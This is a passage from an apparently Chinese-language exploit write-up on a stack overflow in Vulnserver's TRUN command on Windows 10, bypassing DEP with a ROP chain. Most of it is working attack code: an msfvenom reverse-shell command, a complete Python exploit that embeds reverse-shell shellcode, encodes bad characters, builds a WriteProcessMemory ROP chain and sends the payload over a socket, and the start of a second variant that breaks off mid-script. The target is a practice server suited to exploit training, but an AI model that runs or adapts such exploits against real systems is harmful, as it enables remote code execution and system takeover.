<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode</span><br></pre></td></tr></table></figure>
<p>以上是需要注意的地方,当存在单个坏字符时,最终的利用脚本如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">HOST = <span class="string">'192.168.91.160'</span></span><br><span class="line">PORT = <span class="number">9999</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mapBadChars</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> i = <span class="number">0</span></span><br><span class="line"> badIndex = []</span><br><span class="line"> <span class="keyword">while</span> i < len(sh):</span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> BADCHARS:</span><br><span class="line"> <span class="keyword">if</span> sh[i] == c:</span><br><span class="line"> badIndex.append(i)</span><br><span class="line"> i=i+<span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> badIndex</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encodeShellcode</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> REPLACECHARS = <span class="string">b"\xff"</span></span><br><span class="line"> encodedShell = sh</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> encodedShell = encodedShell.replace(struct.pack(<span class="string">"B"</span>, BADCHARS[i]), struct.pack(<span class="string">"B"</span>, REPLACECHARS[i]))</span><br><span class="line"> <span class="keyword">return</span> encodedShell</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">decodeShellcode</span><span class="params">(dllBase, badIndex, shellcode)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00"</span></span><br><span class="line"> CHARSTOADD = <span class="string">b"\x01"</span></span><br><span class="line"> restoreRop = <span class="string">b""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(badIndex)):</span><br><span class="line"> <span class="keyword">if</span> i == <span class="number">0</span>:</span><br><span class="line"> offset = badIndex[i]</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> offset = badIndex[i] - badIndex[i<span class="number">-1</span>]</span><br><span class="line"> neg_offset = (-offset) & <span class="number">0xffffffff</span></span><br><span class="line"> value = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> j <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> <span class="keyword">if</span> shellcode[badIndex[i]] == BADCHARS[j]:</span><br><span class="line"> value = CHARSTOADD[j]</span><br><span class="line"> value = (value) | <span class="number">0x11111100</span> <span class="comment"># DL</span></span><br><span class="line"> print(hex(value))</span><br><span class="line"></span><br><span class="line"> <span class="comment"># current EAX point to the address of shellcode-1</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x7637768e</span>)) <span class="comment"># POP ECX # RETN ** [WS2_32.DLL] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (neg_offset))</span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x758ba9a8</span>)) <span class="comment"># SUB EAX,ECX # RETN ** [KERNEL32.DLL] ** </span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (<span class="number">0x7721aed0</span>)) <span class="comment"># POP EDX # RETN ** [ntdll.dll] **</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (value)) <span class="comment"># values in DL</span></span><br><span class="line"> restoreRop += struct.pack(<span class="string">"<L"</span>, (dllBase + <span class="number">0x755bc4eb</span>)) <span class="comment"># ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] ** </span></span><br><span class="line"> <span class="keyword">return</span> restoreRop </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode</span></span><br><span class="line"> shellcode = <span class="string">b""</span></span><br><span class="line"> shellcode += <span class="string">b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"</span></span><br><span class="line"> shellcode += <span class="string">b"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"</span></span><br><span class="line"> shellcode += <span class="string">b"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"</span></span><br><span class="line"> shellcode += <span class="string">b"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"</span></span><br><span class="line"> shellcode += <span class="string">b"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"</span></span><br><span class="line"> shellcode += <span class="string">b"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"</span></span><br><span class="line"> shellcode += <span class="string">b"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"</span></span><br><span class="line"> shellcode += <span class="string">b"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"</span></span><br><span class="line"> shellcode += <span class="string">b"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"</span></span><br><span class="line"> shellcode += <span class="string">b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"</span></span><br><span class="line"> shellcode += <span class="string">b"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"</span></span><br><span class="line"> shellcode += <span class="string">b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff"</span></span><br><span class="line"> shellcode += <span class="string">b"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"</span></span><br><span class="line"> shellcode += <span class="string">b"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40"</span></span><br><span class="line"> shellcode += <span class="string">b"\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"</span></span><br><span class="line"> shellcode += <span class="string">b"\x6a\x05\x68\xc0\xa8\x5b\x89\x68\x02\x00\x11"</span></span><br><span class="line"> shellcode += <span class="string">b"\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74"</span></span><br><span class="line"> shellcode += <span class="string">b"\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75"</span></span><br><span class="line"> shellcode += <span class="string">b"\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d"</span></span><br><span class="line"> shellcode += <span class="string">b"\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12"</span></span><br><span class="line"> shellcode += <span class="string">b"\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"</span></span><br><span class="line"> shellcode += <span class="string">b"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"</span></span><br><span class="line"> shellcode += <span class="string">b"\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"</span></span><br><span class="line"> shellcode += <span class="string">b"\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"</span></span><br><span class="line"> shellcode += <span class="string">b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a"</span></span><br><span class="line"> shellcode += <span class="string">b"\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"</span></span><br><span class="line"> shellcode += <span class="string">b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f"</span></span><br><span class="line"> shellcode += <span class="string">b"\x6a\x00\x53\xff\xd5"</span></span><br><span class="line"></span><br><span class="line"> pos = mapBadChars(shellcode)</span><br><span class="line"> print(pos)</span><br><span class="line"> encodedRevShell = encodeShellcode(shellcode)</span><br><span class="line"></span><br><span class="line"> func = struct.pack(<span class="string">"<L"</span>,<span class="number">0x45454545</span>) <span class="comment"># WriteProcessMemory Address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Shellcode Return Address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0xFFFFFFFF</span>) <span class="comment"># pseudo Process handle</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501c10</span>) <span class="comment"># Code cave address</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy lpBuffer (Stack address) </span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x41414141</span>) <span class="comment"># dummy nSize</span></span><br><span class="line"> func += struct.pack(<span class="string">"<L"</span>,<span class="number">0x62502028</span>) <span class="comment"># lpNumberOfBytesWritten</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> eip = struct.pack(<span class="string">"<L"</span>,<span class="number">0x62501022</span>) <span class="comment"># retn essfunc.dll</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># save ESP to ESI,EDX,EAX</span></span><br><span class="line"> rop1 = struct.pack(<span class="string">"<L"</span>, <span class="number">0x755912d6</span>) <span class="comment"># PUSH ESP # POP ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x755b671f</span>) <span class="comment"># MOV EDX,ESI # POP ESI # RETN 0x04 </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7728bdf4</span>) <span class="comment"># MOV EAX,EDX # POP ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x41414141</span>) <span class="comment"># junk</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching dummy lpBuffer</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x88888888</span>) <span class="comment"># 0x88888888</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x77777988</span>) <span class="comment"># 0x77777988</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758fe636</span>) <span class="comment"># MOV EAX,EDX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f4480</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching dummy nSize</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffffdf4</span>) <span class="comment"># 0xfffffdf4</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Patching WriteProcessMemory Address</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772f4302</span>) <span class="comment"># SUB EAX,16 # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x74a01e84</span>) <span class="comment"># INC EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758cc157</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x62506090</span>) <span class="comment"># IAT 62506090 AddAtomA KERNEL32 </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75fd7518</span>) <span class="comment"># XCHG EAX,DWORD PTR [ECX] # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7557771b</span>) <span class="comment"># POP EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0xfffd9df0</span>) <span class="comment"># 0xfffd9df0</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x758f15ce</span>) <span class="comment"># NEG EAX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75515163</span>) <span class="comment"># ADD EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a9052</span>) <span class="comment"># XCHG EAX,ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x76068122</span>) <span class="comment"># XCHG EAX,EDI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x754e2d6d</span>) <span class="comment"># MOV DWORD PTR [EAX],ECX # RETN </span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># save current EAX to EBX</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7730e63c</span>) <span class="comment"># XCHG EAX,ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x75f84c67</span>) <span class="comment"># MOV EAX,ESI # RETN</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Align EAX with shellcode</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772a5a6f</span>) <span class="comment"># POP ECX # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>,<span class="number">0xfffffda8</span>) <span class="comment"># 0n600</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x772974e4</span>) <span class="comment"># SUB EAX,ECX # RETN ** [ntdll.dll] ** </span></span><br><span class="line"></span><br><span class="line"> rop1 += decodeShellcode(<span class="number">0</span>, pos, shellcode)</span><br><span class="line"></span><br><span class="line"> <span class="comment"># Align ESP with ROP Skeleton</span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x7730e63c</span>) <span class="comment"># XCHG EAX,ESI # RETN </span></span><br><span class="line"> rop1 += struct.pack(<span class="string">"<L"</span>, <span class="number">0x749f2002</span>) <span class="comment"># XCHG EAX,ESP # RETN </span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment"># padding = b"C" * (3000-2006-32-len(rop1)-len(shellcode))</span></span><br><span class="line"> padding = <span class="string">b"\x44"</span> * <span class="number">16</span></span><br><span class="line"></span><br><span class="line"> PAYLOAD = (</span><br><span class="line"> <span class="string">b'TRUN .'</span> +</span><br><span class="line"> <span class="string">b'A'</span> * (<span class="number">2006</span>-len(func)) +</span><br><span class="line"> func +</span><br><span class="line"> eip +</span><br><span class="line"> rop1 + </span><br><span class="line"> <span class="string">b"\x90"</span>*<span class="number">80</span>+</span><br><span class="line"> encodedRevShell+</span><br><span class="line"> padding</span><br><span class="line"> )</span><br><span class="line"></span><br><span class="line"> <span class="keyword">with</span> socket.create_connection((HOST, PORT)) <span class="keyword">as</span> fd:</span><br><span class="line"> fd.sendall(PAYLOAD)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
<p>喜闻乐见的反弹<code>shell</code>如下:</p>
<p><img src="/2022/05/30/Vulnserver-TRUN-Bypass-DEP-With-ROP-On-Win10-II/21.png" alt="BOF"></p>
<p>单坏字符,用于解码的<code>ROP Gadgets</code>一般不会很长,如果涉及很多坏字符,解码的<code>ROP Gadgets</code>会很长,最终可能因为栈空间不够,导致<code>shellcode</code>受到挤压,后续被截断,最终导致利用失败。</p>
<p>尝试7个坏字符时,最后因为栈空间不够导致<code>shellcode</code>被截断了。最终,试了<code>3</code>个坏字符的情况,还算正常。利用脚本如下:</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">HOST = <span class="string">'192.168.91.160'</span></span><br><span class="line">PORT = <span class="number">9999</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mapBadChars</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00\x09\x0a"</span></span><br><span class="line"> i = <span class="number">0</span></span><br><span class="line"> badIndex = []</span><br><span class="line"> <span class="keyword">while</span> i < len(sh):</span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> BADCHARS:</span><br><span class="line"> <span class="keyword">if</span> sh[i] == c:</span><br><span class="line"> badIndex.append(i)</span><br><span class="line"> i=i+<span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> badIndex</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">encodeShellcode</span><span class="params">(sh)</span>:</span></span><br><span class="line"> BADCHARS = <span class="string">b"\x00\x09\x0a"</span></span><br><span class="line"> REPLACECHARS = <span class="string">b"\xff\x10\x06"</span></span><br><span class="line"> encodedShell = sh</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(BADCHARS)):</span><br><span class="line"> encodedShell = 